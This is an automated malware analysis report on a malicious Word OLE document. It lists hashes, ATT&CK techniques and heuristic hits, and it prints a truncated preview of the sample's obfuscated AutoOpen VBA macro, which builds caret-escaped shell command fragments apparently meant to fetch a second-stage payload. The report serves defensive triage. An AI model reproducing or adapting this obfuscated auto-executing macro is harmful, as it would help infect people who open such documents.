Office (OLE) malware analysis — malicious · ff227b6daaae1788

MALICIOUS

Office (OLE)

181.1 KB Created: 2018-09-25 07:47:00 Authoring application: Microsoft Office Word First seen: 2019-02-26

MD5: 97f29ca811a4911fc5f094619ec140b4 SHA-1: 7129c85e31028a8891bed15df9184e9a99b24e79 SHA-256: ff227b6daaae178805aeef700a26bd4a5ee14751863753b2ccc24ee640f480bc

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating a Shell() call within the VBA macros. The AutoOpen macro is present, which is a common entry point for malicious VBA code. The script is heavily obfuscated and truncated, but the presence of Shell() strongly suggests it is designed to download and execute a second-stage payload. The legacy WordBasic AutoExec marker also points to older macro execution techniques.

Heuristics 5

VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 172448 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	172448 bytes
SHA-256: `bec4e2963624b73d6cef4ddd12898038436c0d3c6aa28d215340503f678cdde7`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "JzlPEAHo" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim ZoqAo(2) ZoqAo(0) = Mid(dfjkWGOL + loRURdmansOEzDUQ + zlbGhdW, 259, 782) + Right(izhjiuH + ONcFOSXjDuvvolOjziYlML + bXSJME, 319) ZoqAo(1) = MidB(JVsOFqo + liKvdofLKpcPuwIGui + cAtUWVt, 773, 702) + Right(ZBCftdd + FWJubOIJhqzvDivICRWFb + cCRPcQ, 885) + Right(FqwtIM + CKjizjIJVlbhMHlGs + ZDwdc, 99) + MidB(zqhPCRw + ihGTvIVoJlmXGsoffTriWi + uTPPNRGX, 199, 238) Dim vcnowA(2) vcnowA(0) = MidB(jobEhTK + DjlaMbWZYUQihbMGjDiWs + FrLiu, 135, 914) + Left(czDiB + CcUMAHraiGimVNBViOKdN + bzNDC, 28) vcnowA(1) = Left(ftYjLwsT + AQulPVhjlAGqwfAdXj + zqTUBp, 438) + Left(DRNEHpjG + VdonuSMSrqjfuBvnTrJzGo + mqqQXpLk, 722) Dim RatdB(2) RatdB(0) = Left(UAVAZr + ChjjmPwrzztNfjmkalUE + SUuurLJ, 570) + Mid(ujVjr + CdCjzpUBQHjshdUvEzzopP + mDdZsH, 38, 357) RatdB(1) = MidB(zTiaLqvC + aRDVPvOCpMTKShqObqOD + BQilJ, 861, 751) + Mid(wVzHK + PPkndIMsTEoSpLNOfkAtw + CWMjPjRi, 525, 981) + MidB(YsElGqow + kHcnwRPWnOifzDYWkOM + vVawuDI, 505, 938) + Right(FDbjAaM + itnOGHmbREYLzqJUSfoh + ZvbpW, 188) Dim lJNoJI(2) lJNoJI(0) = Right(ijPwb + HtJWVSSjbsbqPuVYYdKNIZH + rQfrkVk, 760) + Right(wSScSMQh + jNrptrTwBzOLqodrUfGj + OFArA, 840) lJNoJI(1) = MidB(OsdZqwsB + nsiGbpQPqnNdjimSEiJF + wLEFCwTq, 981, 870) + Right(HdMCkbB + OwPLTijcincclKM + WinUCX, 158) + Left(uhDCw + oujrkGPBJwAkOJsikI + wwcih, 935) + Right(MtMzQd + PHYSsYHkVSuJSslnsH + SSslHXTI, 723) Dim OdkcQ(2) OdkcQ(0) = Left(GzMipHuu + fpIbqGAAnzwjlADV + UPBAbc, 775) + Mid(qNRPdvA + KicPkrjAzDGjoLaGa + RWQwlhBj, 714, 697) OdkcQ(1) = Right(LsoEfJr + rZdAphbVuGITMnGbiQLTn + rzGuz, 673) + Right(azmwwz + PqMYsjFrDQQLfpdpbLbwX + lHMrJ, 539) + MidB(wdamULQB + SEDvrzGTzFotpubsAtoML + ODJiKKY, 36, 85) + MidB(qQPkq + uHjlBRpJCBirOiDKf + QslBmDKc, 308, 44) pmSOaFvRbQ (KeyString(BMcEvE + TCLuoTN + 6 + 3 + 3 + 4 + 51 + iiwNZ + caSuTK) + sVlHOFDB + ZkfvcEbh + KeyString(aEMcJ + UmZTJmX + 7 + 3 + 3 + 5 + 59 + hGPGaj + ASrhwN) + oFJmiQzm + FOwHNkjj + jdlfI + RvKYz + ZRvGzw + MYUDIS + aACjw + PafPBO + bmiiimBGLz + urifcYTXIzT + ksnpVpfZQBv + uPuhtElmz + kwhwTwvqX + AChMsm + wifNuGjH) Dim rJzpL(1) rJzpL(0) = MidB(jLKaF + ouwptRhClpDqorhNtKa + qPDLb, 114, 363) + Left(cZzKuO + JHNAIcRBTtsPsOwiaFGwT + NSfizSh, 884) End Sub Attribute VB_Name = "DLinmKEmZ" Function oFJmiQzm() XRswEicdG = "d" + " " + CStr(Chr(6 + 3 + 6 + 6 + 26)) + "V^" + ":" + "^" + "O" + CStr(Chr(6 + 3 + 6 + 6 + 26)) + "C" + CStr(Chr(4 + 2 + 4 + 4 + 20)) + "^s" + "^e" + "^t" uAlkXElHCcz = " " + "?^" + "}" + "^" + "`" + "=^" + "13" + "^0" + "^ " Dim jAVBIR(2) jAVBIR(0) = Mid(MJZuaA + FdzWikcdwwmXTRdsjKfZv + DqwHD, 628, 627) + Mid(LXZzvXnX + FrsrdRHWQaEEAYjVtPFci + DfwMWH, 260, 502) jAVBIR(1) = Mid(LzUqGY + PHSZZOkCSFzPGNRLJtS + jFVnOim, 821, 921) + Right(wEdFhc + vUQDwOcoNAlopUtzp + ODSzmBj, 232) + Right(aNvJTBY + BwdvLShQkofdhPFMbNscjSLj + WSUXpVh, 719) + MidB(jFkvb + wfjEHbwmJVtiLlRR + oMiUE, 593, 323) Dim jzYsuw(2) jzYsuw(0) = Mid(lavkj + DjuOwBLVCCcJbhrYjZItw + TAbjlG, 921, 201) + Right(QtNJBo + XjmdEqsKoFvOYhLGoRw + wQTriPfk, 689) jzYsuw(1) = MidB(QlqvkX + HEhiSfobikAbCnfnNvJVLK + mrPVRZAZ, 885, 326) + Right(MqopB + zOzKINEAzjWTshZNTaact + VGXGT, 385) Dim bjpjHH(1) bjpjHH(0) = Mid(zbKuRIio + njBXlDFswHtiPKzMCSGG + AiTkMbj, 44, 72) + Right(hDwlkBO + GzvkjqjbzhZVwdVfWXr + iDOzbSQ, 843) + Mid(UDmiDWvH + zFMHNGjjrPOFdcjAi + hcbhiuRJ, 522, 312) + Mid(jYqGlL + IAcGjZdtOHRZJfjhMOaQ + CdjnWu, 791, 439) EMNmTH = "35" + "0^" + " ^" + "1" + "0" + "3" + " " + "^" FLZICm = "3^" + "5^" + "1 " + "^" + "3" + "^5" MOriiPO = "^" + "9" + "^ " + "3" + "^1" + "^0" + " " + "0" + "^1" + "^3" + " ^" + "9" + "^" ivUcpr = "51" + " " + "5^" + "1" + "^9" + "^" + " " UBkmFrj = "^1" + "5" + "3^" + " " + "09" + "^5" + "^ " + "9" + "^" + "05" iUPMdDsUWiw = " " + "9^" + "0" + "1" + " " + "^" + "5" + "1" + "0" + " " oFJmiQzm = XRs ... (truncated)

SHA-256: bec4e2963624b73d6cef4ddd12898038436c0d3c6aa28d215340503f678cdde7

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "JzlPEAHo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim ZoqAo(2)
ZoqAo(0) = Mid(dfjkWGOL + loRURdmansOEzDUQ + zlbGhdW, 259, 782) + Right(izhjiuH + ONcFOSXjDuvvolOjziYlML + bXSJME, 319)
ZoqAo(1) = MidB(JVsOFqo + liKvdofLKpcPuwIGui + cAtUWVt, 773, 702) + Right(ZBCftdd + FWJubOIJhqzvDivICRWFb + cCRPcQ, 885) + Right(FqwtIM + CKjizjIJVlbhMHlGs + ZDwdc, 99) + MidB(zqhPCRw + ihGTvIVoJlmXGsoffTriWi + uTPPNRGX, 199, 238)
   Dim vcnowA(2)
vcnowA(0) = MidB(jobEhTK + DjlaMbWZYUQihbMGjDiWs + FrLiu, 135, 914) + Left(czDiB + CcUMAHraiGimVNBViOKdN + bzNDC, 28)
vcnowA(1) = Left(ftYjLwsT + AQulPVhjlAGqwfAdXj + zqTUBp, 438) + Left(DRNEHpjG + VdonuSMSrqjfuBvnTrJzGo + mqqQXpLk, 722)
   Dim RatdB(2)
RatdB(0) = Left(UAVAZr + ChjjmPwrzztNfjmkalUE + SUuurLJ, 570) + Mid(ujVjr + CdCjzpUBQHjshdUvEzzopP + mDdZsH, 38, 357)
RatdB(1) = MidB(zTiaLqvC + aRDVPvOCpMTKShqObqOD + BQilJ, 861, 751) + Mid(wVzHK + PPkndIMsTEoSpLNOfkAtw + CWMjPjRi, 525, 981) + MidB(YsElGqow + kHcnwRPWnOifzDYWkOM + vVawuDI, 505, 938) + Right(FDbjAaM + itnOGHmbREYLzqJUSfoh + ZvbpW, 188)
   Dim lJNoJI(2)
lJNoJI(0) = Right(ijPwb + HtJWVSSjbsbqPuVYYdKNIZH + rQfrkVk, 760) + Right(wSScSMQh + jNrptrTwBzOLqodrUfGj + OFArA, 840)
lJNoJI(1) = MidB(OsdZqwsB + nsiGbpQPqnNdjimSEiJF + wLEFCwTq, 981, 870) + Right(HdMCkbB + OwPLTijcincclKM + WinUCX, 158) + Left(uhDCw + oujrkGPBJwAkOJsikI + wwcih, 935) + Right(MtMzQd + PHYSsYHkVSuJSslnsH + SSslHXTI, 723)
   Dim OdkcQ(2)
OdkcQ(0) = Left(GzMipHuu + fpIbqGAAnzwjlADV + UPBAbc, 775) + Mid(qNRPdvA + KicPkrjAzDGjoLaGa + RWQwlhBj, 714, 697)
OdkcQ(1) = Right(LsoEfJr + rZdAphbVuGITMnGbiQLTn + rzGuz, 673) + Right(azmwwz + PqMYsjFrDQQLfpdpbLbwX + lHMrJ, 539) + MidB(wdamULQB + SEDvrzGTzFotpubsAtoML + ODJiKKY, 36, 85) + MidB(qQPkq + uHjlBRpJCBirOiDKf + QslBmDKc, 308, 44)
pmSOaFvRbQ (KeyString(BMcEvE + TCLuoTN + 6 + 3 + 3 + 4 + 51 + iiwNZ + caSuTK) + sVlHOFDB + ZkfvcEbh + KeyString(aEMcJ + UmZTJmX + 7 + 3 + 3 + 5 + 59 + hGPGaj + ASrhwN) + oFJmiQzm + FOwHNkjj + jdlfI + RvKYz + ZRvGzw + MYUDIS + aACjw + PafPBO + bmiiimBGLz + urifcYTXIzT + ksnpVpfZQBv + uPuhtElmz + kwhwTwvqX + AChMsm + wifNuGjH)
   Dim rJzpL(1)
rJzpL(0) = MidB(jLKaF + ouwptRhClpDqorhNtKa + qPDLb, 114, 363) + Left(cZzKuO + JHNAIcRBTtsPsOwiaFGwT + NSfizSh, 884)
End Sub


Attribute VB_Name = "DLinmKEmZ"
Function oFJmiQzm()
XRswEicdG = "d" + " " + CStr(Chr(6 + 3 + 6 + 6 + 26)) + "V^" + ":" + "^" + "O" + CStr(Chr(6 + 3 + 6 + 6 + 26)) + "C" + CStr(Chr(4 + 2 + 4 + 4 + 20)) + "^s" + "^e" + "^t"
uAlkXElHCcz = " " + "?^" + "}" + "^" + "`" + "=^" + "13" + "^0" + "^ "
Dim jAVBIR(2)
jAVBIR(0) = Mid(MJZuaA + FdzWikcdwwmXTRdsjKfZv + DqwHD, 628, 627) + Mid(LXZzvXnX + FrsrdRHWQaEEAYjVtPFci + DfwMWH, 260, 502)
jAVBIR(1) = Mid(LzUqGY + PHSZZOkCSFzPGNRLJtS + jFVnOim, 821, 921) + Right(wEdFhc + vUQDwOcoNAlopUtzp + ODSzmBj, 232) + Right(aNvJTBY + BwdvLShQkofdhPFMbNscjSLj + WSUXpVh, 719) + MidB(jFkvb + wfjEHbwmJVtiLlRR + oMiUE, 593, 323)
   Dim jzYsuw(2)
jzYsuw(0) = Mid(lavkj + DjuOwBLVCCcJbhrYjZItw + TAbjlG, 921, 201) + Right(QtNJBo + XjmdEqsKoFvOYhLGoRw + wQTriPfk, 689)
jzYsuw(1) = MidB(QlqvkX + HEhiSfobikAbCnfnNvJVLK + mrPVRZAZ, 885, 326) + Right(MqopB + zOzKINEAzjWTshZNTaact + VGXGT, 385)
   Dim bjpjHH(1)
bjpjHH(0) = Mid(zbKuRIio + njBXlDFswHtiPKzMCSGG + AiTkMbj, 44, 72) + Right(hDwlkBO + GzvkjqjbzhZVwdVfWXr + iDOzbSQ, 843) + Mid(UDmiDWvH + zFMHNGjjrPOFdcjAi + hcbhiuRJ, 522, 312) + Mid(jYqGlL + IAcGjZdtOHRZJfjhMOaQ + CdjnWu, 791, 439)
EMNmTH = "35" + "0^" + " ^" + "1" + "0" + "3" + " " + "^"
FLZICm = "3^" + "5^" + "1 " + "^" + "3" + "^5"
MOriiPO = "^" + "9" + "^ " + "3" + "^1" + "^0" + " " + "0" + "^1" + "^3" + " ^" + "9" + "^"
ivUcpr = "51" + " " + "5^" + "1" + "^9" + "^" + " "
UBkmFrj = "^1" + "5" + "3^" + " " + "09" + "^5" + "^ " + "9" + "^" + "05"
iUPMdDsUWiw = " " + "9^" + "0" + "1" + " " + "^" + "5" + "1" + "0" + " "
oFJmiQzm = XRs
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.